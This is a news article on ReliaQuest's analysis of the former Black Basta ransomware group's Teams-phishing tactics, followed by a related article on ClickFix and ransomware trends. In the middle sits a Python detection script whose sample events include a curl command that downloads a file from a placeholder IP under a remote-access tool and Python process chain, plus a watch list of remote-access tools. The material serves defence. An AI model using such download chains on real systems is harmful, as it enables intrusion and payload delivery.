ReliaQuest details Black Basta's legacy & rise of Teams phishing

Techday NZ, 12-06-2025

ReliaQuest has released an in-depth report on the state of Black Basta, a former ransomware-as-a-service (RaaS) group, following the leak of the group's internal chat logs and its subsequent dissolution in February 2025.
The demise of Black Basta, a Russian-speaking criminal group previously active in naming up to 50 victims each month on its data-leak site, was triggered by a member known as ExploitWhispers. This individual leaked private chat logs on Telegram out of frustration with the group's decision to target Russian financial organisations, revealing the internal dynamics and operational methods of one of the most prolific RaaS groups to date.
Ongoing impact
Despite the cessation of activity under the Black Basta name, ReliaQuest's analysis shows that many of the group's phishing and intrusion tactics continue to be used. Former affiliates are operating with a consistent set of methods, relying heavily on large-scale email spam and Microsoft Teams phishing, and adapting to include techniques such as Python script execution to deliver payloads.
"Despite the group's dissolution, former members continue to use its tried-and-tested tactics, with mass email spam followed by Teams phishing remaining a persistent and effective attack method. 'New' ransomware groups like '3AM' are taking pages from Black Basta's playbook, particularly its signature phishing tactic," ReliaQuest notes in its assessment.
The organisation reported that Teams phishing attacks have maintained a steady pace since February 2025, with a marked increase in April when these incidents accounted for more than 35% of Black Basta-style activity targeting ReliaQuest's own customers. Half of these observed attacks originated from onmicrosoft[.]com domains, exploiting the ease of account creation and rotation on Microsoft's platform. The report suggests this trend is expected to continue.
The use of onmicrosoft[.]com domains remains the primary method for launching phishing campaigns via Teams, but the report highlights that efforts to compromise microsoft[.]com accounts, which give campaigns more credibility, are also growing. While such attacks are harder to carry out, their sophistication and risk could increase in the coming months.
Evolving methodology
"Recently, attackers have introduced Python script execution alongside these techniques, using cURL requests to fetch and deploy malicious payloads."
ReliaQuest documented a May 2025 case involving a manufacturing sector client, where attackers used a Teams phishing campaign from an onmicrosoft[.]com-based account to gain remote access via Quick Assist and AnyDesk. Python scripts were then deployed to download and execute a markdown file, enabling command and control (C2) communications. The attack was detected and contained before it could escalate.
Shifts among ransomware groups
The closure of Black Basta's data-leak site, paired with the continuation of its trademark tactics, suggests that its former members may have joined other RaaS collectives or formed new ones. Leaked chat logs indicate a substantial payment—between USD $500,000 and USD $600,000—by Black Basta's leader to the Cactus RaaS group, suggesting a relationship between the two. There was also a notable increase in named victim organisations on Cactus's data-leak site that coincided with Black Basta's closure.
Another scenario under consideration is that affiliates have transitioned to "Blacklock", a RaaS group previously known as Eldorado, which has named more than 50 organisations on its site. Eldorado's Russian-speaking origins and rebranding have led to speculation about links to Black Basta's membership.
Internal organisation and adaptation
ReliaQuest's analysis of the leaked chat logs provides insight into Black Basta's operational structure, which included defined roles such as intrusion specialists, campaign managers, and ransomware developers. The group also collaborated with external malware developers and used purchased access to tools like QakBot and DarkGate for campaigns, maintaining communication chains for technical support and updates.
ReliaQuest highlights the group's flexibility in tactics, warning that an overemphasis on defending against a single vector, such as brute-force attacks, could leave organisations exposed to more sophisticated phishing methods. The report urges a comprehensive, multi-layered defence posture.
Mitigating the threat
ReliaQuest emphasises the importance of user education to counter the social engineering techniques favoured by ransomware affiliates. "To counter these threats, organisations should prioritise user education on phishing tactics. Informed and vigilant employees are often the first and most effective line of defence, stopping social engineering attacks before they succeed."
Recent case studies in sectors including finance, insurance, and construction indicated that previous staff training helped potential victims avoid compromise during coordinated phishing campaigns. Security teams received real-time alerts and took prompt action, benefiting from employee awareness programmes.
Additional recommendations for defence include restricting the use of personal Google accounts on company devices, implementing detection rules for unusual Python activity, monitoring for unauthorised remote-access tools, and deploying automated response playbooks for threat containment.
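The two detection recommendations above (unusual Python activity, unauthorised remote-access tools) can be expressed as rules over endpoint process-creation telemetry. The following is an added example written for this article, not code from ReliaQuest's report or platform; the event schema (pid, ppid, image, command line), the remote-access tool list and the sample events are all constructed assumptions. It flags the chain the May 2025 case describes: a remote-access tool session, Python launched beneath it, and a cURL fetch of a file driven by that Python process.

```python
import re
from pathlib import PureWindowsPath

# Constructed process-creation events (pid, ppid, image, command line); not real telemetry.
# 203.0.113.10 is a documentation-range address used purely as a placeholder.
SAMPLE_EVENTS = [
    {"pid": 100, "ppid": 1,   "image": r"C:\Windows\explorer.exe", "cmd": "explorer.exe"},
    {"pid": 200, "ppid": 100, "image": r"C:\Program Files\AnyDesk\AnyDesk.exe", "cmd": "AnyDesk.exe"},
    {"pid": 210, "ppid": 200, "image": r"C:\Windows\System32\cmd.exe", "cmd": "cmd.exe /c stage.bat"},
    {"pid": 220, "ppid": 210, "image": r"C:\Python312\python.exe", "cmd": "python.exe stage.py"},
    {"pid": 230, "ppid": 220, "image": r"C:\Windows\System32\curl.exe",
     "cmd": r"curl.exe -s http://203.0.113.10/readme.md -o C:\Users\Public\readme.md"},
    {"pid": 300, "ppid": 100, "image": r"C:\Python312\python.exe", "cmd": "python.exe build.py"},
]

# Assumed list of remote-access tool binaries worth watching; extend per environment.
REMOTE_ACCESS_TOOLS = {"anydesk.exe", "quickassist.exe", "teamviewer.exe"}
URL_RE = re.compile(r"https?://", re.IGNORECASE)

def basename(path):
    """Lower-cased file name of a Windows image path."""
    return PureWindowsPath(path).name.lower()

def ancestors(pid, by_pid):
    """Yield the image names of every ancestor process, nearest parent first."""
    ev = by_pid.get(pid)
    while ev and ev["ppid"] in by_pid:
        ev = by_pid[ev["ppid"]]
        yield basename(ev["image"])

def detect(events, approved_remote_tools=frozenset()):
    """Return (rule, pid) alerts for the remote-access -> Python -> cURL chain."""
    by_pid = {e["pid"]: e for e in events}
    alerts = []
    for e in events:
        img = basename(e["image"])
        chain = set(ancestors(e["pid"], by_pid))
        # Rule 1: a remote-access tool that is not on the organisation's allowlist.
        if img in REMOTE_ACCESS_TOOLS and img not in approved_remote_tools:
            alerts.append(("unapproved_remote_access_tool", e["pid"]))
        # Rule 2: Python started somewhere beneath a remote-access tool session.
        if img.startswith("python") and chain & REMOTE_ACCESS_TOOLS:
            alerts.append(("python_under_remote_access_tool", e["pid"]))
        # Rule 3: Python fetching a URL itself, or cURL launched with Python as an ancestor.
        fetches = img.startswith("python") and URL_RE.search(e["cmd"])
        if fetches or (img == "curl.exe" and any(a.startswith("python") for a in chain)):
            alerts.append(("python_driven_download", e["pid"]))
    return alerts
```

The unrelated developer build (pid 300) produces no alert, which is the point of tying the rules to process ancestry rather than to python.exe alone.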
ReliaQuest's threat research team continues to monitor shifting TTPs (tactics, techniques, and procedures) among ransomware groups, rapidly integrating new indicators of compromise into its security platform and supporting customers with intelligence-driven threat hunting and response measures.
The report concludes that the tactics established by Black Basta are likely to remain prominent among ransomware operators, underscoring the need for ongoing vigilance, robust technical controls, and investment in cyber awareness among staff.

Related Articles

ReliaQuest report exposes rise of social engineering cyber threats
ReliaQuest has released its latest quarterly report, outlining identified trends in cyber attacker techniques, malware use, and ransomware group activity observed between March and May 2025 across its customer base.
ClickFix and social engineering tactics
One of the most notable trends identified in the report is the widespread use of ClickFix, a social engineering method that misleads users into pasting malicious commands into tools such as PowerShell or the Windows Run prompt. Attackers disguise these actions as solutions to false issues, such as fake CAPTCHAs or Windows updates, enabling them to circumvent defences and introduce malware with comparative ease. This approach has facilitated the increased use of malware families such as Lumma and SectopRAT, both of which utilise trusted tools like MSHTA to deliver malicious payloads. The report notes that social engineering has significantly contributed to the rise of these attack vectors, stating, "Social engineering played a pivotal role in the success of these top tactics."
Lateral movement and initial access trends
Phishing-based techniques accounted for over half of observed initial access incidents among customers, while drive-by compromise incidents rose by 10% compared to the previous period. The report sees a shift, as attackers increasingly rely on user manipulation rather than exploiting technical vulnerabilities. ReliaQuest's analysis highlights the prominence of remote desktop protocol (RDP) over internal spear phishing as a method of lateral movement within networks. This shift is closely associated with attackers impersonating IT helpdesks to persuade users to install RDP tools. The report finds, "The shift away from tactics like internal spearphishing suggests attackers are favouring techniques that require less user interaction and offer more direct access to internal systems."
Additionally, drive-by downloads powered by campaigns such as ClickFix and widely available phishing kits continue to lower the threshold for cybercriminal activity. External remote resources dropped from third to fourth place among initial access vectors, further illustrating the focus on exploiting human factors.
MSHTA on the rise for defence evasion
MSHTA (Microsoft HTML Application Host), a native Windows binary, was reported to be involved in 33% of defence evasion incidents during the period, up from just 3.1% the previous year. Attackers use this legitimate tool to bypass conventional security tools by convincing users to execute malicious commands themselves, often delivered through social engineering campaigns such as ClearFake. "ClearFake's early adoption of ClickFix techniques propelled MSHTA from 16th to second place among defence evasion tactics. Recently, other ClickFix adopters have fuelled MSHTA's current surge, leveraging broader social engineering tactics to bypass defences more effectively," the report details.
Changes in ransomware operations
The report notes significant changes among ransomware groups, with the closure of "RansomHub" leading many affiliates to migrate to other groups, notably Qilin, which saw a 148% increase in activity. Play and Safepay also reported increased activity of 116% and 266%, respectively. The number of active ransomware groups has dropped by nearly 30%, but newer or established ransomware-as-a-service (RaaS) platforms have absorbed most of these affiliates, raising concerns over increasingly professionalised threats. "With major ransomware groups like RansomHub gone, RaaS operators are vying to capitalise on the influx of affiliates searching for new platforms. To attract this talent, we'll likely see RaaS platforms introduce innovative capabilities or revise profit-sharing models. This competition is expected to create a more fragmented yet increasingly sophisticated ransomware ecosystem, posing even greater challenges for defenders."
Impact on industry sectors
The construction industry was the only sector to see an increase in ransomware attack victims, rising by 15%. ReliaQuest attributes this to opportunistic targeting as attackers seek out industries with perceived weaker defences. The report notes, "Construction organisations may feel compelled to pay ransoms quickly to avoid costly downtime and operational delays, making them attractive targets." By contrast, the retail sector saw a 62% decrease in victims, attributed to a drop in activity from the "CL0P" ransomware Cleo campaign.
Malware trends and threat actor activity
The period saw increased activity by the SectopRAT malware, delivered via ClickFix and malvertising campaigns. Despite infrastructure takedowns in May 2025, Lumma infostealer operations continue, with new logs advertised on cybercriminal forums and marketplaces. "Although Lumma's activity is likely to decline over the coming months as the impact of the takedown continues to unfold, it's likely the group could regain traction over time. As attention around the takedown diminishes, attackers may return to this familiar and well-established tool," the report comments.
Emergence of Scattered Spider
Scattered Spider, after a five-month hiatus, returned in April 2025 with attacks on UK retail organisations. The group is identified for using detailed social engineering against high-value individuals such as CFOs and utilising both on-premises methods and cloud techniques for stealth and control. "Scattered Spider's success lies in its ability to combine social engineering precision, persistence in cloud environments, and on-premises technical expertise. These TTPs allow the group to achieve initial access, maintain control, and operate stealthily, making it difficult for organizations to detect and remediate the group's activity in the early stages of an attack."
Recommendations and defensive measures
ReliaQuest's report makes several recommendations for organisations, including disabling Windows Run for non-administrative users, enforcing control over RDP tool installations, implementing web filtering, and prioritising user training against social engineering. Additional measures include strengthening identity verification, enabling advanced monitoring, and conducting regular risk assessments, particularly for privileged user accounts. Looking ahead, the report anticipates broader adoption of ClickFix among ransomware affiliates, increased sophistication by groups such as Scattered Spider, and the continued rise of infostealer malware like Acreed. The report concludes by emphasising the need for proactive investment in advanced detection, user education, and securing of both cloud and traditional infrastructure to counter an upward trend in attack complexity and evasion tactics.